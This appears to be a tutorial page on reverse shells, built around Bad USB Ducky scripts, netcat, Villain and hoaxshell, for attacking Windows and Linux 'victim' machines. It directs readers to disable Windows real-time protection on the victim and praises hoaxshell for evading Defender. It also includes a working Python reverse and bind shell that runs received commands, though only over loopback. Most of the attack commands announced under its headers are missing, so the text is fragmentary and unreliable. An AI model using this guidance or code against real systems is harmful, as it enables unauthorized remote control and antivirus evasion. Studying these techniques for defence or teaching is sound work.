Reverse Shell Ducky Script
What's a Shell
A shell is a program that provides a command-line interface for interacting with an operating system.
In a Unix-like operating system, such as Linux or macOS, the default shell is typically "bash" (short for "Bourne-Again SHell"), but other shells such as "sh" (the original Bourne shell), "csh" (the C shell), "ksh" (the Korn shell), and "zsh" (the Z shell) are also available.
In a Windows operating system, the default shell is "cmd.exe" (Command Prompt), but "PowerShell" is also available as a more powerful alternative.
When attacking a remote system, a common first goal is initial access: getting the system to run code of our choosing. That code execution is then used to obtain a shell on the target.
Against a remote server there are two ways to get that command line: make the server connect back to us and hand us a shell (a reverse shell), or make it open a listening port that we then connect to (a bind shell).
Tools
There are a variety of popular tools for receiving reverse shells and connecting to bind shells:
Netcat: It can do many things, but for our purposes it is used to receive reverse shells and to connect to the ports opened by bind shells on a target. The drawback is that a plain netcat shell is not a proper terminal (no TTY, no tab completion, and a Ctrl-C kills the connection), so it feels unstable by default; there are ways to upgrade it.
Socat: Socat is a more powerful version of netcat. It can do everything netcat does and a lot more, and socat shells are usually more stable than netcat shells out of the box (it can hand you a full TTY directly). In that sense it is vastly superior to netcat; the two big catches are that the syntax is harder, and that netcat is installed on virtually every Linux distribution by default while socat very rarely is.
Metasploit, multi/handler: Metasploit is extremely versatile. One of its modules, exploit/multi/handler, is used to receive reverse shells. Because it is part of a larger framework it is easier to obtain stable shells, handle staged payloads, and interact with a Meterpreter session.
Msfvenom: Msfvenom is also part of the Metasploit framework, but it can be used as a standalone tool. It is used to generate all kinds of payloads.
Villain: a Windows and Linux backdoor generator and multi-session handler that lets users connect with sibling servers (other machines running Villain) and share their backdoor sessions, which is handy when working as a team.
Types Of Shells
There are two types of shells we are interested in:
Reverse shells force the target to execute code that connects back to your machine. We set up a listener on our own machine, deliver the payload to the target, and when it runs we receive a shell on the listener. Because the connection is outbound from the target, it usually passes firewalls and NAT that would block an inbound connection.
Bind shells work the other way around. We execute code on the target that opens a listening port and attaches a shell to it, and we then connect to that port. This needs no configuration on our own network (no listener, no port forwarding), but the inbound connection may be blocked by a firewall protecting the target.
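The two connection directions, as an added example that is not from the original page: a minimal reverse shell and bind shell written in Python, run over loopback inside one process so it works offline. The "target" thread deliberately executes whatever command line arrives, which is what the netcat payload does on a real target; the attacker side here plays the role of `nc -lvnp [port]` (reverse) or `nc [target] [port]` (bind). The names `reverse_shell`, `bind_shell` and `_shell_session` are this example's own.

```python
"""Reverse shell vs bind shell over loopback (added example, not the page's code).

Both sides run in one process on 127.0.0.1 so the demo works offline; the
'target' thread executes whatever command line it receives, exactly as a
shell payload does."""
import socket
import subprocess
import threading

HOST = "127.0.0.1"  # loopback only: this demo never leaves the machine


def _recv_line(conn: socket.socket) -> bytes:
    """Read bytes until a newline (one command) or until the peer closes."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = conn.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


def _shell_session(conn: socket.socket) -> None:
    """Target side of either shell type: run one received command and return its output.

    Like a bare netcat shell this has no TTY: commands are just piped to /bin/sh."""
    with conn:
        cmd = _recv_line(conn).decode().strip()
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        conn.sendall((result.stdout + result.stderr).encode())


def _drive(conn: socket.socket, command: str) -> str:
    """Attacker side: send one command line and collect output until the shell closes."""
    conn.sendall(command.encode() + b"\n")
    out = b""
    while chunk := conn.recv(4096):
        out += chunk
    return out.decode()


def reverse_shell(command: str) -> str:
    """Reverse shell: the attacker listens, the target connects back (outbound from target)."""
    listener = socket.socket()
    listener.bind((HOST, 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    # The "payload": the target connects out to the attacker's listener.
    target = threading.Thread(
        target=lambda: _shell_session(socket.create_connection((HOST, port))))
    target.start()
    conn, _ = listener.accept()
    with conn, listener:
        output = _drive(conn, command)
    target.join()
    return output


def bind_shell(command: str) -> str:
    """Bind shell: the target opens a port, the attacker connects in (inbound to target)."""
    listener = socket.socket()
    listener.bind((HOST, 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    def payload() -> None:
        with listener:
            conn, _ = listener.accept()
            _shell_session(conn)

    target = threading.Thread(target=payload)
    target.start()
    with socket.create_connection((HOST, port)) as conn:
        output = _drive(conn, command)
    target.join()
    return output


if __name__ == "__main__":
    print("reverse:", reverse_shell("id"))
    print("bind:", bind_shell("uname -a"))
```

Both functions return the command's output exactly as the remote shell produced it; the only thing that differs between them is which side calls `listen()`/`accept()` and which side calls `create_connection()`, which is the whole distinction the text draws.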
Netcat
Let's start by using Netcat on:
Linux Machine Attacking A Linux Machine
On the attacker's machine:
On the target machine:
[port]: a port on the attacker's machine. Any free port works; well-known ports below 1024 (such as 80 or 443) are often chosen because outbound traffic to them is usually permitted by firewalls. Note that on Linux, listening on a port below 1024 requires root.
example: 81
Linux Machine Attacking A Windows Machine
On the attacker's machine:
On the victim's machine:
This is a single command on one line; if it was wrapped when copying, remove the line break at the start of the second line.
So let's create our Reverse Shell Ducky Script:
First, disable real-time protection on the Windows (victim) machine, either manually or with a Bad USB (you can use the Ducky script below), before running this attack. Turning real-time protection off needs an elevated PowerShell prompt, and on current Windows builds Tamper Protection must also be off or the change is refused.
Now, using any Bad USB, run this Ducky script:
On the attacker's machine (once the connection between the machines is established):
To download and upload files between Windows and Linux:
To open Chrome and Notepad:
To close them:
Documentation:
Other Resources (From GitHub)
Other Tutorials (From YouTube)
Several YouTube tutorials are accessible about reverse shell ducky script:
These YouTube videos (Video1, Video2, Video3) were created by David Bombal
This YouTube video was created by NetworkChuck
This YouTube video was created by Seytonic
This YouTube video was created by Hak5
Villain (Multi-Reverse Shell)
Villain, also known as Multi-Reverse Shell, is a tool designed for educational purposes to demonstrate the concept of a reverse shell in computer security. A reverse shell is a technique used in penetration testing and ethical hacking to gain remote access to a target system.
Villain lets users set up a listener on their machine and establish a reverse shell connection with a target system. Once the connection is established, the user controls the target's command-line interface, which gives remote command execution.
The tool can be used to understand the mechanics of reverse shells, study network security, and learn about the weaknesses that let them be established. It also shows how remote access is used for legitimate purposes, such as managing and administering systems remotely.
Several YouTube tutorials about Villain are available:
This YouTube video was created by John Hammond
This YouTube video was created by t3l3machus
Hoaxshell (A New Reverse Shell Tool)
hoaxshell is an unconventional Windows reverse shell based solely on http(s) traffic, which at the time of its release was undetected by Microsoft Defender and possibly other AV solutions. The tool is easy to use, generates its own PowerShell payload, and supports encryption (SSL).
So far, it has been tested on fully updated Windows 11 Enterprise, Windows Server 2016 Datacenter and Windows 10 Pro boxes (see the video and screenshots).
You can use this Ducky script to run it from a Bad USB:
Latest version of Hoaxshell: